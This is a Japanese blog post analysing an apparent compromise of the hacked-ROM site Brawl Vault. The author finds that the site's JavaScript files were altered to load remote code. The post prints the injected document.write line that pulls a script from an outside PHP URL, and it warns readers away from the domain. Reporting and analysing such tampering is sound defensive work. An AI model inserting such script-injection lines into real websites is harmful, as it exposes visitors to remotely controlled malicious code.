はりをきば

そこにピカマンがいる限り 私はテイッハットウッをやめない

Brawl Vaultがウイルス感染?

¯注意
この記事はを最後に更新されていない。
更新日が1年以上前の記事はリンク切れしていたり、情報としては役に立たなくなっている可能性あり。
ˆMixed Contentについて
この記事は投稿日が古い為、記事中の画像は非SSL(http://)で貼られている。(※投稿画像以外は全てSSL)
この件に関して詳しくはこちらを参照。

追記
2014/01/18、改ざんされたファイル全てが元通りに修正されているのを確認。
もうアクセスしても心配なさそうです。


先程メインで使ってるFirefoxでBVを見てたら、いきなりこんな物騒な画面が出てアクセスブロックされた。
f:id:Gutyan:20140117005537p:plain


サブで使ってるCoolNovoもこんな感じでブロックされる。
f:id:Gutyan:20140117005639p:plain


ハックロムを快く思わない誰かのいたずら通報か? と思ったけど
そうだと言い切れる自信がないので調べてみた。


とりあえず、CoolNovoのデバッガでアクセスログを取得。
すると…
f:id:Gutyan:20140117010048p:plain


BVの核となるJavaScriptファイルの複数から、
ihrhandwerk.deというドメインにあるファイル名が英数字の羅列のPHPにアクセスしている。

【注意】
この記事を投下した時点ではihrhandwerk.deにアクセスしても何も起こりませんが、
今後何を仕掛けられるかわかったもんじゃないので
興味本位でihrhandwerk.deにアクセスしないでください。


とりあえず適当に1つBVのJSを開いてみたら…。
f:id:Gutyan:20140117010333p:plain


script要素をdocument.writeするコードが
以下のスクリプト全てに挿入されとる。


いずれも、最後に以下のコードが追加されてるっぽい。

/* ランダムな英数字 */
document.write("<script src='http://www.ihrhandwerk.de/qmBrvcg6.php?id=129841940' type='text/javascript'></" + "script>");
/*/ ランダムな英数字 */


人力でこんな意味不なコメントを入れる訳ない。
どう見ても改ざんです本当にありがとうございました。


サーバーが安定しない*1上に今度は改竄ですか。。
コーティングもアレだし、ホントしっかりしてくれよBrawl Vaultさんよぅ…

*1:度重なる403/404/503エラーの数々